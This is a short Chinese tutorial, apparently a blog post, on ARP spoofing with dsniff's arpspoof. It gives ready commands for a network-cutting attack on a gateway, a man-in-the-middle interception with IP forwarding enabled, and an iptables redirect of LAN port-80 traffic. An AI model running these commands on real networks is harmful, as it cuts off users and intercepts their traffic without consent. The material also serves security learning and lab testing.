Arp 攻击
· 阅读需 2 分钟
本篇内容仅用于学习和测试,本人遵纪守法。
安装
arpspoof 是 dsniff 包里的一个程序,可用于arp攻击。Manjaro 中执行以下命令安装这个软件包就可以使用了。
yay -S dsniff
介绍
arpspoof - 截获交换局域网中的数据包。
用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
描述
arpspoof通过伪造的ARP响应包改变局域网中从目标主机(或所有主机)到另一个主机(host)的数据包转发路径。这是交换局域网中嗅探网络流量的一种极为有效的方法。
内核IP转发(或如fragrouter这样的、用户层面的、能完成同样功能的软件)必须提前开启。
使用情景
1. 断网攻击,不开启流量转发,使用我的无线网卡 wlp8s0
,攻击网关
sudo arpspoof -i wlp8s0 -t 192.168.1.1
2. 中间人攻击,截获用户和网关之间的流量
开启流量转发
echo 1 >> /proc/sys/net/ipv4/ip_forward
欺骗双方,充当中间人
sudo arpspoof -i wlp8s0 -t 192.168.1.1 192.168.1.106
sudo arpspoof -i wlp8s0 -t 192.168.1.106 192.168.1.1
此时网关以为我是106,而106以为我是网关。双方的流量都将经过这里,使用 WireShark 即可对经 过网卡的流量进行分析。
3. 重定向攻击
使局域网所有设备访问的 80 端口,重定向到我这里的 8080 端口,需要开启流量转发。
sudo arpspoof -i wlp8s0 192.168.1.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080